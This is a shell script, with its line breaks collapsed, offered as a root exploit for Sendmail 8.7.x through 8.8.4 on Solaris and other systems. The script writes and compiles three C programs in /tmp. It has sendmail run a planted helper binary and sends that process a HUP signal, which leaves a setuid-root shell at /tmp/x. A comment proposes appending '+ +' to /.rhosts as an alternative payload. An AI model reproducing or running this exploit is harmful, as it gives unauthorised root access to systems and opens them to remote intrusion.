|
#/bin/sh # # Spac3D0g's Sendmail 8.7.x-8.8.4 root 'sploit. # (Rewritten from Leshka's to support Solaris) # # Tested on Solaris 2.5, 2.5.1, other OS's too.. # # Should create a suid program /tmp/x that calls shell as root. # # Modify RUN in x.c for what you wanna run, and possibly the location # or format of the ps command in the KILL line below for your platform. # # Or you could remove x.c alltogether and just put what you wanna do as # root in smtpd.c (Ie: 'echo "+ +" >>/.rhosts' works nicely) # # cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include<stdio.h> main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi